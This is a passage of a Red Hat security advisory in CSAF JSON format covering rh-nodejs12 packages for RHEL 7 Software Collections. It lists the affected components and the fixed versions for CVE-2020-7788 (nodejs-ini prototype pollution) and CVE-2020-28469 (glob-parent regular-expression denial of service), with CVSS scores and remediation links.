Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le" }, "product_reference": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x" }, "product_reference": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" }, "product_reference": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.7" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-28469", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-04-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1945459" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-glob-parent. The enclosure regex used to check for glob enclosures containing backslashes is vulnerable to Regular Expression Denial of Service attacks. This flaw allows an attacker to cause a denial of service if they can supply a malicious string to the glob-parent function. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-glob-parent: Regular expression denial of service", "title": "Vulnerability summary" }, { "category": "other", "text": "While some components do package a vulnerable version of glob-parent, access to them requires OpenShift OAuth credentials and hence have been marked with a Low impact. This applies to the following products:\n - OpenShift Container Platform (OCP)\n - OpenShift ServiceMesh (OSSM)\n - Red Hat Advanced Cluster Management for Kubernetes (RHACM)\n - OpenShift distributed tracing", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", 